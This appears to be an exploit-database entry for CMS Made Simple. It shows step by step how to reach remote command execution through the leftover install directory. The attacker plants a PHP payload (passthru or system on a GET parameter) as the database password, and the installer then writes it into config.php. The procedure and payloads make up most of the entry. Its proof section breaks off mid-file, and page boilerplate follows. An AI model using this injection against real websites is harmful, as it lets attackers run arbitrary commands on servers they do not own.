CMS Made Simple Install SQL Injection Command Execution

Credit: SAHM
Risk: High
Local: No
Remote: Yes

# CMS Made Simple PHP Code Injection Vulnerability (All versions) # 2014-12-02 # SAHM ( # # All versions ---exploit A malicious attacker can intrude every CMSMS-installed website by taking the following steps: Open the /install folder from the URL (The cms doesn't force users to delete the directory after finishing the installation progress). Ex: http://URL/PATH/install Pass through the steps to get to the fifth step. In a remote host, install a MySQL server and create the following user: user: test password : '.passthru($_GET['command']);exit;// Following that, Create a remotely accessible database and grant all privileges to the user (for further information please read : . Fill in the Database Information form (bottom of the page). db host address: the remote host's IP user: test password: '.system($_GET['command']);exit;// database name: the name of the remote database which has been built After installation, commands can be injected as: http://URL/PATH?command=blah%20blah ---prove At this point, the config.php file content would be something like this: <?php # CMS Made Simple Configuration File # Documentation: /doc/CMSMS_config_reference.pdf #

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top